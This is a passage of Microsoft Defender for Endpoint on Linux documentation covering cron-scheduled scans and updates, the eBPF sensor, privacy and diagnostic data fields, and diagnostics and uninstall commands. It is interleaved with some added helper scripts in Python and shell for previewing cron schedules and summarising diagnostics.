0 * * * * /etc/opt/microsoft/mdatp/logrorate.sh

And

Output

0 2 * * sat /bin/mdatp scan quick>~/mdatp_cron_job.log

See Schedule scans with Microsoft Defender for Endpoint (Linux)

Press "Insert"

Add the following entries:

Bash

CRON_TZ=America/Los_Angeles

RHEL and variants (CentOS and Oracle Linux)

Bash

0 6 * * sun [ $(date +%d) -le 15 ] && sudo yum update mdatp -y >> ~/mdatp_cron_job.log

SLES and variants

Bash

0 6 * * sun [ $(date +%d) -le 15 ] && sudo zypper update mdatp >> ~/mdatp_cron_job.log

Ubuntu and Debian systems

Bash

0 6 * * sun [ $(date +%d) -le 15 ] && sudo apt-get install --only-upgrade mdatp >> ~/mdatp_cron_job.log

7 Note

In the examples above, we are setting it to 00 minutes, 6 a.m. (hour in 24 hour
format), any day of the month, any month, on Sundays. [ $(date +%d) -le 15 ] means
the update won't run unless the day of the month is the 15th or earlier (3rd week).
Meaning it will run on the Sundays (7) that fall on or before the 15th of the month,
at 6:00 a.m. Pacific (UTC -8).

Press "Esc"

Type " :wq " w/o the double quotes.

7 Note

w == write, q == quit

To view your cron jobs, type sudo crontab -l


To inspect cron job runs:

Bash

sudo grep mdatp /var/log/cron

To inspect the mdatp_cron_job.log

Bash

sudo nano mdatp_cron_job.log

For those who use Ansible, Chef, or Puppet

Use the following commands:

To set cron jobs in Ansible

Ansible module: cron - Manage cron.d and crontab entries

See https://docs.ansible.com/ansible/latest/modules/cron_module.html for more
information.

To set crontabs in Chef

Chef resource: cron resource

See https://docs.chef.io/resources/cron/ for more information.

To set cron jobs in Puppet

Resource Type: cron

See https://puppet.com/docs/puppet/5.5/types/cron.html for more information.

Automating with Puppet: Cron jobs and scheduled tasks

See https://puppet.com/blog/automating-puppet-cron-jobs-and-scheduled-tasks/ for
more information.

Additional information

To get help with crontab


Bash

man crontab

To get a list of crontab file of the current user


Bash

crontab -l

To get a list of crontab file of another user


Bash

crontab -u username -l

To back up crontab entries


Bash

crontab -l > /var/tmp/cron_backup.dat

 Tip

Do this before you edit or remove.

To restore crontab entries


Bash
crontab /var/tmp/cron_backup.dat

To edit the crontab and add a new job as a root user


Bash

sudo crontab -e

To edit the crontab and add a new job


Bash

crontab -e

To edit other user's crontab entries


Bash

crontab -u username -e

To remove all crontab entries


Bash

crontab -r

To remove other user's crontab entries


Bash

crontab -u username -r

Explanation

+------------- minute (values: 0 - 59) (special characters: , - * /)
| +----------- hour (values: 0 - 23) (special characters: , - * /)
| | +--------- day of month (values: 1 - 31) (special characters: , - * / L W C)
| | | +------- month (values: 1 - 12) (special characters: , - * /)
| | | | +----- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , - * / L W C)
| | | | |
* * * * * command to be executed
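To see what the five-field schedules on this page and on the scan-scheduling page above actually select, here is an added example (not Microsoft's code and not part of mdatp or cron) that expands crontab fields with the characters in the explanation (`*`, `,`, `-`, `/`, plus three-letter day and month names), applies the POSIX rule that a restricted day-of-month and day-of-week match on either, and lists upcoming runs. It also applies the `[ $(date +%d) -le 15 ]` guard from the update job as a day filter. CRON_TZ is not modelled; all times are taken as wall-clock in the zone the crontab runs in, and the starting date of 1 March 2024 is a constructed choice.

```python
"""Expand five-field crontab schedules and list their upcoming runs.

Added example (not Microsoft's code): supports the * , - / characters and
three-letter day and month names; CRON_TZ is not modelled, times are wall-clock.
"""
from datetime import datetime, timedelta

NAMES = {"sun": 0, "mon": 1, "tue": 2, "wed": 3, "thu": 4, "fri": 5, "sat": 6,
         "jan": 1, "feb": 2, "mar": 3, "apr": 4, "may": 5, "jun": 6,
         "jul": 7, "aug": 8, "sep": 9, "oct": 10, "nov": 11, "dec": 12}
# (minimum, maximum) of each field in crontab order: minute, hour, dom, month, dow.
RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]


def _value(token):
    token = token.lower()
    return NAMES[token] if token in NAMES else int(token)


def expand_field(field, lo, hi):
    """Return the set of integers one crontab field selects (e.g. '*/15' -> {0,15,30,45})."""
    selected = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            first, last = part.split("-", 1)
            start, end = _value(first), _value(last)
        else:
            start = _value(part)
            end = hi if step > 1 else start   # '5/10' means every 10 starting at 5
        selected.update(range(start, end + 1, step))
    return selected


def parse_spec(spec):
    """Parse 'min hour dom month dow' into value sets plus the POSIX day-matching rule."""
    fields = spec.split()
    if len(fields) != 5:
        raise ValueError("expected 5 fields: minute hour day-of-month month day-of-week")
    minute, hour, dom, month, dow = (expand_field(f, lo, hi) for f, (lo, hi) in zip(fields, RANGES))
    if 7 in dow:                      # Sunday may be written as 0 or 7
        dow = (dow - {7}) | {0}
    # When both day fields are restricted, a day matches if EITHER of them does.
    either = fields[2] != "*" and fields[4] != "*"
    return minute, hour, dom, month, dow, either


def day_matches(parsed, day):
    _, _, dom, month, dow, either = parsed
    cron_dow = (day.weekday() + 1) % 7   # Python: Monday=0, cron: Sunday=0
    in_dom, in_dow = day.day in dom, cron_dow in dow
    return day.month in month and ((in_dom or in_dow) if either else (in_dom and in_dow))


def matches(spec, when):
    """True if the crontab spec fires at the given minute."""
    parsed = parse_spec(spec)
    return when.minute in parsed[0] and when.hour in parsed[1] and day_matches(parsed, when)


def next_runs(spec, start, count, day_guard=lambda day: True):
    """Return the next `count` run times at or after `start`, looking about 13 months ahead."""
    parsed = parse_spec(spec)
    minutes, hours = sorted(parsed[0]), sorted(parsed[1])
    runs, day = [], start.replace(hour=0, minute=0, second=0, microsecond=0)
    for _ in range(400):
        if day_matches(parsed, day) and day_guard(day):
            for h in hours:
                for m in minutes:
                    when = day.replace(hour=h, minute=m)
                    if when >= start:
                        runs.append(when)
                        if len(runs) == count:
                            return runs
        day += timedelta(days=1)
    return runs


def schedule_preview(spec, year, month, day, count, first_half_only=False):
    """Runs from a date as 'YYYY-MM-DD HH:MM'; first_half_only applies the [ $(date +%d) -le 15 ] guard."""
    guard = (lambda d: d.day <= 15) if first_half_only else (lambda d: True)
    return [r.strftime("%Y-%m-%d %H:%M") for r in next_runs(spec, datetime(year, month, day), count, guard)]


if __name__ == "__main__":
    print("scan   ", schedule_preview("0 2 * * sat", 2024, 3, 1, 3))        # scan job from the scan page
    print("update ", schedule_preview("0 6 * * sun", 2024, 3, 1, 4, True))  # update job with the -le 15 guard
```

From 1 March 2024 the scan entry fires on 2, 9 and 16 March at 02:00, and the update entry with the day guard fires on 3 and 10 March and then 7 and 14 April at 06:00: with the guard, the Sundays that qualify are those in the first half of each month, which is what the shell test in the crontab line enforces.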

Use eBPF-based sensor for Microsoft
Defender for Endpoint on Linux
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint on Linux


Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

The extended Berkeley Packet Filter (eBPF) for Microsoft Defender for Endpoint on Linux
provides supplementary event data for Linux operating systems. eBPF can be used as an
alternative technology to auditd because eBPF helps address several classes of issues
seen with the auditd event provider and is beneficial in the areas of performance and
system stability.

Key benefits include:

Reduced system-wide auditd-related log noise


Optimized system-wide event rules otherwise causing conflict between
applications
Reduced overhead for file event (file read/open) monitoring
Improved event rate throughput and reduced memory footprint
Optimized performance for specific configurations

How eBPF works


With eBPF, events previously obtained from the auditd event provider now flow from
the eBPF sensor. This helps with system stability, improves CPU and memory utilization,
and reduces disk usage. Also, when eBPF is enabled, all auditd-related custom rules are
eliminated, which helps reduce the possibility of conflicts between applications. Data
related to eBPF gets logged into the
/var/log/microsoft/mdatp/microsoft_defender_core.log file.

In addition, the eBPF sensor uses capabilities of the Linux kernel without requiring the
use of a kernel module that helps increase system stability.

7 Note

eBPF is used in conjunction with auditd: auditd is used only for user login
events and captures these events without any custom rules, and they flow through
automatically. Be aware that auditd will be gradually removed in future versions.

System prerequisites
The eBPF sensor for Microsoft Defender for Endpoint on Linux is supported on the
following minimum distribution and kernel versions:

Linux Distribution    Distribution version    Kernel version
Ubuntu                16.04                   4.15.0
Fedora                33                      5.8.15
CentOS                7.6                     3.10.0-957.10
SLES                  15                      5.3.18-18.47
RHEL                  7.6                     3.10.0-957.10
Debian                9.0                     4.19.0
Oracle Linux RHCK     7.9                     3.10.0-1160
Oracle Linux UEK      7.9                     5.4
Amazon Linux 2        2                       5.4.261-174.360

7 Note

Oracle Linux 8.8 with kernel version 5.15.0-0.30.20.el8uek.x86_64 or
5.15.0-0.30.20.1.el8uek.x86_64 will result in a kernel hang when eBPF is enabled as
supplementary subsystem provider. These kernel versions should not be used for eBPF
mode. Refer to the Troubleshooting and Diagnostics section for mitigation steps.

Use eBPF
The eBPF sensor is automatically enabled for all customers by default for agent versions
"101.23082.0006" and above. Customers need to update to the above-mentioned
supported versions to experience the feature. When the eBPF sensor is enabled on an
endpoint, Defender for Endpoint on Linux updates supplementary_events_subsystem to
ebpf.

If you want to manually disable eBPF, run the following command:

Bash

sudo mdatp config ebpf-supplementary-event-provider --value [enabled/disabled]

You can also update the mdatp_managed.json file:

JSON

{
  "features": {
    "ebpfSupplementaryEventProvider": "disabled"
  }
}

Refer to the link for a detailed sample json file - Set preferences for Microsoft Defender
for Endpoint on Linux.

) Important

If you disable eBPF, the supplementary event provider switches back to auditd. In
the event eBPF doesn't become enabled or is not supported on any specific kernel,
it will automatically switch back to auditd and retain all auditd custom rules.

Immutable mode of Auditd

For customers using auditd in immutable mode, a reboot is required after enabling
eBPF in order to clear the audit rules added by Microsoft Defender for Endpoint. This is
a limitation of the immutable mode of auditd, which freezes the rules file and prohibits
editing/overwriting. The issue is resolved with the reboot. After the reboot, run the
following command to check whether the audit rules were cleared.

Bash

% sudo auditctl -l

The output of above command should show no rules or any user added rules. In case
the rules didn't get removed, then perform the following steps to clear the audit rules
file.

1. Switch to ebpf mode


2. Remove the file /etc/audit/rules.d/mdatp.rules
3. Reboot the machine

Troubleshooting and Diagnostics


You can check the agent health status by running the mdatp health command. Make
sure that the eBPF sensor for Defender for Endpoint on Linux is supported by checking
the current kernel version by using the following command line:

Bash

uname -a

Known Issues

1. Enabling eBPF on RHEL 8.1 version with SAP might result in kernel panic. To
mitigate this issue you can take one of the following steps:

Use a distro version higher than RHEL 8.1.
Switch to auditd mode if you need to use RHEL 8.1 version.

2. Using Oracle Linux 8.8 with kernel version 5.15.0-0.30.20.el8uek.x86_64 or
5.15.0-0.30.20.1.el8uek.x86_64 might result in kernel panic. To mitigate this issue you can
take one of the following steps:

Use a kernel version higher or lower than 5.15.0-0.30.20.el8uek.x86_64 or
5.15.0-0.30.20.1.el8uek.x86_64 on Oracle Linux 8.8 if you want to use eBPF as
supplementary subsystem provider. Note that the minimum kernel version
for Oracle Linux RHCK is 3.10.0 and for Oracle Linux UEK is 5.4.
Switch to auditd mode if you need to use the same kernel version:

Bash

sudo mdatp config ebpf-supplementary-event-provider --value disabled

The following two sets of data help analyze potential issues and determine the most
effective resolution options.

1. Collect a diagnostic package from the client analyzer tool by using the following
instructions: Troubleshoot performance issues for Microsoft Defender for Endpoint
on Linux.

2. Collect a debug diagnostic package when Defender for Endpoint is utilizing high
resources by using the following instructions: Microsoft Defender for Endpoint on
Linux resources.

Troubleshooting performance issues

If you see a spike in resource consumption by Microsoft Defender on your endpoints, it's
important to identify the process, mount point, or files that are consuming the most
CPU or memory and then apply the necessary exclusions. If wdavdaemon (the parent
process) is still consuming resources after you apply the possible AV exclusions, use the
ebpf-statistics command to obtain the top system call counts:

Bash

sudo mdatp diagnostic ebpf-statistics

Output

Monitor 20 seconds
Top file paths:
/var/log/microsoft/mdatp/microsoft_defender.log : 10
/var/log/microsoft/mdatp/rotated/microsoft_defender.log00001 : 2
/var/log/microsoft/mdatp/rotated/microsoft_defender.log : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374993 : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374991 : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374989 : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374987 : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374985 : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374983 : 1
/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374981 : 1

Top initiator paths:
/usr/bin/stress-ng : 50000
/opt/microsoft/mdatp/sbin/wdavdaemon : 13

Top syscall ids:
82 : 1699333
90 : 10
87 : 3
In the above output, you can see that stress-ng is the top process generating a large
number of events, which might result in performance issues. Most likely stress-ng is
generating the system call with ID 82. You can create a ticket with Microsoft to get this
process excluded. In the future, as part of upcoming enhancements, you'll have more
control to apply such exclusions yourself.
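The following script is an added example, not part of the Microsoft documentation: it parses the output of mdatp diagnostic ebpf-statistics into the facts an exclusion ticket needs (top initiator process, its event count, and the top system call). The syscall-id-to-name mapping assumes an x86_64 host (ids differ on other architectures), and the embedded sample is constructed from the output shown above with shortened paths.

```shell
#!/bin/sh
# Added example (not from the Microsoft docs): summarise the output of
# "sudo mdatp diagnostic ebpf-statistics" so the noisiest process and system call
# can be named precisely. Assumes a POSIX sh with awk and sed.

# Constructed sample, modelled on the output shown in the docs (paths shortened).
SAMPLE='Monitor 20 seconds
Top file paths:
/var/log/microsoft/mdatp/microsoft_defender.log : 10
/home/user/tmp-stress-ng-rename/stress-ng-rename-1 : 1

Top initiator paths:
/usr/bin/stress-ng : 50000
/opt/microsoft/mdatp/sbin/wdavdaemon : 13

Top syscall ids:
82 : 1699333
90 : 10
87 : 3'

# syscall_name ID: name of an x86_64 system call id. Only the ids seen in the docs
# output are mapped (assumption: x86_64 host; the rename workload in the sample is
# consistent with id 82 = rename). Extend from your platform's syscall table.
syscall_name() {
    case "$1" in
        82) echo rename ;;
        87) echo unlink ;;
        90) echo chmod ;;
        *)  echo "syscall_$1" ;;
    esac
}

# top_entry SECTION: read ebpf-statistics output on stdin and print "<name> <count>"
# for the first (highest-count) row of the named section, e.g. "initiator paths".
# Rows look like "<name> : <count>"; names are assumed not to contain spaces.
top_entry() {
    awk -v section="$1" '
        /^Top .*:$/ { insec = ($0 == ("Top " section ":")); next }
        insec && NF >= 3 && $(NF-1) == ":" { print $1, $NF; exit }
    '
}

# summarize_ebpf_stats: read the full tool output on stdin and print one line naming
# the top event source and the top system call. Fails if either section is missing.
summarize_ebpf_stats() {
    stats=$(cat)
    # shellcheck disable=SC2046  # word splitting of "name count" pairs is intended
    set -- $(printf '%s\n' "$stats" | top_entry "initiator paths") \
           $(printf '%s\n' "$stats" | top_entry "syscall ids")
    [ "$#" -eq 4 ] || { echo "could not parse ebpf-statistics output" >&2; return 1; }
    printf 'top_initiator=%s events=%s top_syscall=%s(%s) count=%s\n' \
        "$1" "$2" "$(syscall_name "$3")" "$3" "$4"
}

# Entry point: "--demo" summarises the embedded sample, "--stdin" summarises real
# output piped in, e.g.  sudo mdatp diagnostic ebpf-statistics | sh ebpf_summary.sh --stdin
case "${1:-}" in
    --demo)  printf '%s\n' "$SAMPLE" | summarize_ebpf_stats ;;
    --stdin) summarize_ebpf_stats ;;
esac
```

For the constructed sample the summary line reads top_initiator=/usr/bin/stress-ng events=50000 top_syscall=rename(82) count=1699333, which is exactly the information the text above asks you to put in the ticket.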

Exclusions applied to auditd can't be migrated or copied to eBPF. Common concerns
such as noisy logs, kernel panics, and noisy syscalls are already taken care of by eBPF
internally. If you want to add any further exclusions, reach out to Microsoft to get the
necessary exclusions applied.

See also
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux resources


Deploy updates for Microsoft Defender for Endpoint on Linux
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Microsoft regularly publishes software updates to improve performance and security, and
to deliver new features.

Warning

Each version of Defender for Endpoint on Linux is set to expire automatically after 9
months. While expired versions continue to receive security intelligence updates,
install the latest version to get all available fixes and enhancements.
To check the expiration date, run the following command:

Bash

mdatp health --field product_expiration

Generally available Microsoft Defender for Endpoint capabilities are equivalent
regardless of the update channel used for a deployment (Beta (Insider), Preview
(External), Current (Production)).

To update Defender for Endpoint on Linux manually, execute one of the following
commands:

RHEL and variants (CentOS and Oracle Linux)

Bash

sudo yum update mdatp

SLES and variants

Bash

sudo zypper update mdatp

Ubuntu and Debian systems

Bash

sudo apt-get install --only-upgrade mdatp

Important

When Defender for Cloud is provisioning the Microsoft Defender for Endpoint
agent to Linux servers, it keeps the client updated automatically.

To schedule an update of Microsoft Defender for Endpoint on Linux, see Schedule an
update of the Microsoft Defender for Endpoint (Linux).

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Privacy for Microsoft Defender for Endpoint on Linux
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Microsoft is committed to providing you with the information and controls you need to
make choices about how your data is collected and used when you're using Defender
for Endpoint on Linux.

This article describes the privacy controls available within the product, how to manage
these controls with policy settings, and more details on the data events that are
collected.

Overview of privacy controls in Microsoft Defender for Endpoint on Linux

This section describes the privacy controls for the different types of data that are
collected by Defender for Endpoint on Linux.

Diagnostic data
Diagnostic data is used to keep Defender for Endpoint secure and up to date, detect,
diagnose and fix problems, and also make product improvements.

Some diagnostic data is required, while some diagnostic data is optional. We give you
the ability to choose whether to send us required or optional diagnostic data by using
privacy controls, such as policy settings for organizations.

There are two levels of diagnostic data for Defender for Endpoint client software that
you can choose from:

- Required: The minimum data necessary to help keep Defender for Endpoint
  secure, up to date, and performing as expected on the device it's installed on.
- Optional: Other data that helps Microsoft make product improvements and
  provides enhanced information to help detect, diagnose, and remediate issues.

By default, only required diagnostic data is sent to Microsoft.

Cloud-delivered protection data

Cloud-delivered protection is used to provide increased and faster protection with
access to the latest protection data in the cloud.

Enabling the cloud-delivered protection service is optional; however, it's highly
recommended because it provides important protection against malware on your
endpoints and across your network.

Sample data
Sample data is used to improve the protection capabilities of the product, by sending
Microsoft suspicious samples so they can be analyzed. Enabling automatic sample
submission is optional.

There are three levels for controlling sample submission:

- None: no suspicious samples are submitted to Microsoft.
- Safe: only suspicious samples that don't contain personally identifiable information
  (PII) are submitted automatically. This is the default value.
- All: all suspicious samples are submitted to Microsoft.

Manage privacy controls with policy settings

If you're an IT administrator, you might want to configure these controls at the
enterprise level.

The privacy controls for the various types of data described in the preceding section
are described in detail in Set preferences for Defender for Endpoint on Linux.

As with any new policy settings, you should carefully test them out in a limited,
controlled environment to ensure the settings that you configure have the desired effect
before you implement the policy settings more widely in your organization.

Diagnostic data events

This section describes what is considered required diagnostic data and what is
considered optional diagnostic data, along with a description of the events and fields
that are collected.

Data fields that are common for all events

There's some information about events that is common to all events, regardless of
category or data subtype.

The following fields are considered common for all events:

platform
    The broad classification of the platform on which the app is running. Allows
    Microsoft to identify on which platforms an issue may be occurring so that it can
    correctly be prioritized.

machine_guid
    Unique identifier associated with the device. Allows Microsoft to identify whether
    issues are impacting a select set of installs and how many users are impacted.

sense_guid
    Unique identifier associated with the device. Allows Microsoft to identify whether
    issues are impacting a select set of installs and how many users are impacted.

org_id
    Unique identifier associated with the enterprise that the device belongs to. Allows
    Microsoft to identify whether issues are impacting a select set of enterprises and
    how many enterprises are impacted.

hostname
    Local device name (without DNS suffix). Allows Microsoft to identify whether issues
    are impacting a select set of installs and how many users are impacted.

product_guid
    Unique identifier of the product. Allows Microsoft to differentiate issues
    impacting different flavors of the product.

app_version
    Version of the Defender for Endpoint on Linux application. Allows Microsoft to
    identify which versions of the product are showing an issue so that it can
    correctly be prioritized.

sig_version
    Version of the security intelligence database. Allows Microsoft to identify which
    versions of the security intelligence are showing an issue so that it can correctly
    be prioritized.

supported_compressions
    List of compression algorithms supported by the application, for example
    ['gzip']. Allows Microsoft to understand what types of compression can be used
    when it communicates with the application.

release_ring
    Ring that the device is associated with (for example Insider Fast, Insider Slow,
    Production). Allows Microsoft to identify on which release ring an issue may be
    occurring so that it can correctly be prioritized.

Required diagnostic data

Required diagnostic data is the minimum data necessary to help keep Defender for
Endpoint secure, up to date, and performing as expected on the device it's installed on.

Required diagnostic data helps to identify problems with Microsoft Defender for
Endpoint that may be related to a device or software configuration. For example, it can
help determine if a Defender for Endpoint feature crashes more frequently on a
particular operating system version, with newly introduced features, or when certain
Defender for Endpoint features are disabled. Required diagnostic data helps Microsoft
detect, diagnose, and fix these problems more quickly so the impact to users or
organizations is reduced.

Software setup and inventory data events

Microsoft Defender for Endpoint installation / uninstallation:

The following fields are collected:

correlation_id
    Unique identifier associated with the installation.

version
    Version of the package.

severity
    Severity of the message (for example Informational).

code
    Code that describes the operation.

text
    Additional information associated with the product installation.

Microsoft Defender for Endpoint configuration:

The following fields are collected:

antivirus_engine.enable_real_time_protection
    Whether real-time protection is enabled on the device or not.

antivirus_engine.passive_mode
    Whether passive mode is enabled on the device or not.

cloud_service.enabled
    Whether cloud-delivered protection is enabled on the device or not.

cloud_service.timeout
    Time-out when the application communicates with the Defender for Endpoint cloud.

cloud_service.heartbeat_interval
    Interval between consecutive heartbeats sent by the product to the cloud.

cloud_service.service_uri
    URI used to communicate with the cloud.

cloud_service.diagnostic_level
    Diagnostic level of the device (required, optional).

cloud_service.automatic_sample_submission
    Automatic sample submission level of the device (none, safe, all).

cloud_service.automatic_definition_update_enabled
    Whether automatic definition update is turned on or not.

edr.early_preview
    Whether the device should run EDR early preview features.

edr.group_id
    Group identifier used by the detection and response component.

edr.tags
    User-defined tags.

features.[optional feature name]
    List of preview features, along with whether they're enabled or not.

Product and service usage data events

Security intelligence update report:

The following fields are collected:

from_version
    Original security intelligence version.

to_version
    New security intelligence version.

status
    Status of the update indicating success or failure.

using_proxy
    Whether the update was done over a proxy.

error
    Error code if the update failed.

reason
    Error message if the update failed.

Product and service performance data events for required diagnostic data

Kernel extension statistics:

The following fields are collected:

version
    Version of Defender for Endpoint on Linux.

instance_id
    Unique identifier generated on kernel extension startup.

trace_level
    Trace level of the kernel extension.

subsystem
    The underlying subsystem used for real-time protection.

ipc.connects
    Number of connection requests received by the kernel extension.

ipc.rejects
    Number of connection requests rejected by the kernel extension.

ipc.connected
    Whether there's any active connection to the kernel extension.

Support data

Diagnostic logs:

Diagnostic logs are collected only with the consent of the user as part of the feedback
submission feature. The following files are collected as part of the support logs:

- All files under /var/log/microsoft/mdatp
- Subset of files under /etc/opt/microsoft/mdatp that are created and used by
  Defender for Endpoint on Linux
- Product installation and uninstallation logs under /var/log/microsoft/mdatp/*.log

Optional diagnostic data

Optional diagnostic data is additional data that helps Microsoft make product
improvements and provides enhanced information to help detect, diagnose, and fix
issues.

If you choose to send us optional diagnostic data, required diagnostic data is also
included.

Examples of optional diagnostic data include data Microsoft collects about product
configuration (for example number of exclusions set on the device) and product
performance (aggregate measures about the performance of components of the
product).

Software setup and inventory data events for optional diagnostic data

Microsoft Defender for Endpoint configuration:

The following fields are collected:

connection_retry_timeout
    Connection retry time-out when communicating with the cloud.

file_hash_cache_maximum
    Size of the product cache.

crash_upload_daily_limit
    Limit of crash logs uploaded daily.

antivirus_engine.exclusions[].is_directory
    Whether the exclusion from scanning is a directory or not.

antivirus_engine.exclusions[].path
    Path that was excluded from scanning.

antivirus_engine.exclusions[].extension
    Extension excluded from scanning.

antivirus_engine.exclusions[].name
    Name of the file excluded from scanning.

antivirus_engine.scan_cache_maximum
    Size of the product cache.

antivirus_engine.maximum_scan_threads
    Maximum number of threads used for scanning.

antivirus_engine.threat_restoration_exclusion_time
    Time-out before a file restored from the quarantine can be detected again.

antivirus_engine.threat_type_settings
    Configuration for how different threat types are handled by the product.

filesystem_scanner.full_scan_directory
    Full scan directory.

filesystem_scanner.quick_scan_directories
    List of directories used in quick scan.

edr.latency_mode
    Latency mode used by the detection and response component.

edr.proxy_address
    Proxy address used by the detection and response component.
Microsoft Auto-Update configuration:

The following fields are collected:

how_to_check
    Determines how product updates are checked (for example automatic or manual).

channel_name
    Update channel associated with the device.

manifest_server
    Server used for downloading updates.

update_cache
    Location of the cache used to store updates.

Product and service usage

Diagnostic log upload started report

The following fields are collected:

sha256
    SHA256 identifier of the support log.

size
    Size of the support log.

original_path
    Path to the support log (always under /var/opt/microsoft/mdatp/wdavdiag/).

format
    Format of the support log.

Diagnostic log upload completed report

The following fields are collected:

request_id
    Correlation ID for the support log upload request.

sha256
    SHA256 identifier of the support log.

blob_sas_uri
    URI used by the application to upload the support log.

Product and service performance data events for product service and usage

Unexpected application exit (crash):

Unexpected application exits and the state of the application when that happens.

Kernel extension statistics:

The following fields are collected. They are aggregated numerical values, representing
the count of events that happened since kernel extension startup:

pkt_ack_timeout
pkt_ack_conn_timeout
ipc.ack_pkts
ipc.nack_pkts
ipc.send.ack_no_conn
ipc.send.nack_no_conn
ipc.send.ack_no_qsq
ipc.send.nack_no_qsq
ipc.ack.no_space
ipc.ack.timeout
ipc.ack.ackd_fast
ipc.ack.ackd
ipc.recv.bad_pkt_len
ipc.recv.bad_reply_len
ipc.recv.no_waiter
ipc.recv.copy_failed
ipc.kauth.vnode.mask
ipc.kauth.vnode.read
ipc.kauth.vnode.write
ipc.kauth.vnode.exec
ipc.kauth.vnode.del
ipc.kauth.vnode.read_attr
ipc.kauth.vnode.write_attr
ipc.kauth.vnode.read_ex_attr
ipc.kauth.vnode.write_ex_attr
ipc.kauth.vnode.read_sec
ipc.kauth.vnode.write_sec
ipc.kauth.vnode.take_own
ipc.kauth.vnode.link
ipc.kauth.vnode.create
ipc.kauth.vnode.move
ipc.kauth.vnode.mount
ipc.kauth.vnode.denied
ipc.kauth.vnode.ackd_before_deadline
ipc.kauth.vnode.missed_deadline
ipc.kauth.file_op.mask
ipc.kauth_file_op.open
ipc.kauth.file_op.close
ipc.kauth.file_op.close_modified
ipc.kauth.file_op.move
ipc.kauth.file_op.link
ipc.kauth.file_op.exec
ipc.kauth.file_op.remove
ipc.kauth.file_op.unmount
ipc.kauth.file_op.fork
ipc.kauth.file_op.create

Resources

Privacy at Microsoft

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Resources
Article • 11/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Collect diagnostic information

If you can reproduce a problem, first increase the logging level, run the system for some
time, and then restore the logging level to the default.

1. Increase the logging level:

Bash

mdatp log level set --level debug

Output

Log level configured successfully

2. Reproduce the problem.

3. Run the following command to back up Defender for Endpoint's logs. The files are
stored inside a .zip archive.

Bash

sudo mdatp diagnostic create

This command also prints the file path to the backup after the operation succeeds:

Output

Diagnostic file created: <path to file>

4. Restore the logging level:

Bash

mdatp log level set --level info

Output

Log level configured successfully
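The four steps above as one script, added here and not part of the Microsoft documentation. It assumes MDATP names the mdatp binary (default mdatp), that the reproduction command is passed as the script's arguments, and that the whole script runs as root because mdatp diagnostic create requires it; its point is that the log level is restored to info even when the reproduction step fails, so the agent is not left writing debug logs.

```shell
#!/bin/sh
# Added example (not from the Microsoft docs): run the four-step log collection as
# one unit so the log level always returns to "info", even when reproduction fails.
# Assumes: MDATP names the mdatp binary (default "mdatp"); run as root because
# "mdatp diagnostic create" needs it, e.g.  sudo sh collect.sh ./reproduce.sh
MDATP="${MDATP:-mdatp}"

# set_log_level LEVEL: wraps "mdatp log level set", discarding the success message.
set_log_level() {
    "$MDATP" log level set --level "$1" >/dev/null
}

# collect_mdatp_diagnostics CMD [ARG...]:
#   1. raise the log level to debug
#   2. run CMD to reproduce the problem (its failure is recorded, not fatal)
#   3. create the diagnostic package and extract the path the tool prints
#   4. restore the log level to info
# Prints the package path; returns CMD's exit status, or 1 if no package was made.
collect_mdatp_diagnostics() {
    set_log_level debug || return 1
    repro_status=0
    "$@" || repro_status=$?
    # The tool prints "Diagnostic file created: <path to file>"; keep only the path.
    pkg=$("$MDATP" diagnostic create | sed -n 's/^Diagnostic file created: //p')
    set_log_level info || echo "warning: log level is still at debug" >&2
    [ -n "$pkg" ] || { echo "no diagnostic package was created" >&2; return 1; }
    printf '%s\n' "$pkg"
    return "$repro_status"
}

# Entry point when run as a script; does nothing when no command is given.
if [ "$#" -gt 0 ]; then
    collect_mdatp_diagnostics "$@"
fi
```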

Log installation issues

If an error occurs during installation, the installer only reports a general failure.

The detailed log is saved to /var/log/microsoft/mdatp/install.log. If you experience
issues during installation, send us this file so we can help diagnose the cause.

Uninstall Defender for Endpoint on Linux

There are several ways to uninstall Defender for Endpoint on Linux. If you are using a
configuration tool such as Puppet, follow the package uninstallation instructions for the
configuration tool.

Manual uninstallation

- sudo yum remove mdatp for RHEL and variants (CentOS and Oracle Linux).
- sudo zypper remove mdatp for SLES and variants.
- sudo apt-get purge mdatp for Ubuntu and Debian systems.
- sudo dnf remove mdatp for Mariner.

Configure from the command line

Important tasks, such as controlling product settings and triggering on-demand scans,
can be done from the command line.

Global options

By default, the command-line tool outputs the result in human-readable format. In
addition, the tool also supports outputting the result as JSON, which is useful for
automation scenarios. To change the output to JSON, pass --output json to any of the
commands below.

Supported commands

The following table lists commands for some of the most common scenarios. Run mdatp
help from the terminal to view the full list of supported commands.

Group | Scenario
    Command

Configuration | Turn on/off real-time protection
    mdatp config real-time-protection --value [enabled|disabled]

Configuration | Turn on/off behavior monitoring
    mdatp config behavior-monitoring --value [enabled|disabled]

Configuration | Turn on/off cloud protection
